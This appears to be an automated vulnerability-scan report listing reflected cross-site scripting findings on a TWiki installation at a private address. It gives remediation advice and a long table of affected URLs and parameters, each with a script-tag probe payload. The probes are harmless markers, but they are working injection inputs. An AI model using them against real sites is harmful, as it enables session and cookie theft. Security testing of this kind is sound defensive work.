1. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. 2. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL,JavaScript, and CSS encoding. 3. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend. 4. You can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.Cross site scripting (also referred to as XSS) is a vulnerability that allowsan attacker to send malicious code (usually in the form of Javascript) to another user.Because a browser cannot know if the script should be trusted or not, it will execute thescript in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/view/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev=1.22 | Target: http://192.168.105.200/twiki/bin/view/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?rev=1.22%3C%2Ftitle%3E%3CScRiPt %3EPJMk(5514)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >PJMk(5514)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebTopicViewTemplate?rev=r1.6 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebTopicViewTemplate?rev=r1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >uHyf(1161)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >iFJK(9156)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >hOfO(2848)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicViewTemplate?rev1=1.6&rev2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >cYAl(3179)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >cAZV(3809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >vhSe(9488)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >gLxV(2864)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >sbMS(7039)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ojIr(7820)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >lVtk(9498)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xMGa(3620)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GmTl(7015)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >osKd(9499)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev1=1.18&rev2=1.17 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >tybb(7137)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VDVU(9666)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >iFJK(9156)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ocyo(2010)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiWordzXXHVlcqHCKC?rev2=1.1&rev1=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >uetF(4595)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >pgay(2113)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiTutorial?rev=r1.13 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiTutorial?rev=r1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Qihl(8987)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cKPZ(3310)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiMission?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >CWgd(4435)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiNotation?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >UiBV(7883)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev=r1.7 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev=r1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</td><ScRiPt >nXWr(6563)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >MZlm(4554)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cAZV(3809)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload¶m1=view.ppt | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload¶m1=view.ppt has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tTtd(9970)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZMdq(7895)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/MainFeatures?rev=r1.13 | Target: http://192.168.105.200/twiki/bin/view/TWiki/MainFeatures?rev=r1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Ygnk(9005)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >DdrR(9224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >tBHH(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >WISF(5898)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbook?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >tBHH(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >iIiV(8860)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.38&rev2=1.37 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >HhLm(2117)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >YKow(2102)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >dial(4055)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TntV(1629)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Yqgf(1667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >OuiG(1689)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >cYQR(9849)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >qyDI(7224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >djZh(6990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TRQj(4977)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >zlhC(1656)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ChnX(7517)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >OuiG(1689)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >MSdo(9700)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >TtSL(6019)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?rev=r1.35 | Target: http://192.168.105.200/twiki/bin/view/TWiki/TWikiSystemRequirements?rev=r1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Swns(1074)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/MainFeatures?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >Oolg(6307)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VJdm(8140)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rdLY(8587)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >vSMj(5644)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 | Target: http://192.168.105.200/twiki/bin/rdiff/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev1=1.10&rev2=1.9 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >vSMj(5644)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VQVr(3209)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >VYHS(9431)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?rev1=1.7&rev2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >nGCz(5657)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >MSdo(9700)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ChnX(7517)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KFDg(1578)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebSiteToolsHnuxrfHrpDye?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebSiteToolsHnuxrfHrpDye?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >nVwF(9576)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >uoPe(4619)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >sCPs(7861)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >cKPZ(3310)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >DdrR(9224)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ocyo(2010)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev=r1.18 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?rev=r1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >Ohcj(6605)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiSystemRequirements?rev2=1.1&rev1=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >fzqk(9382)</ScRiPt> |
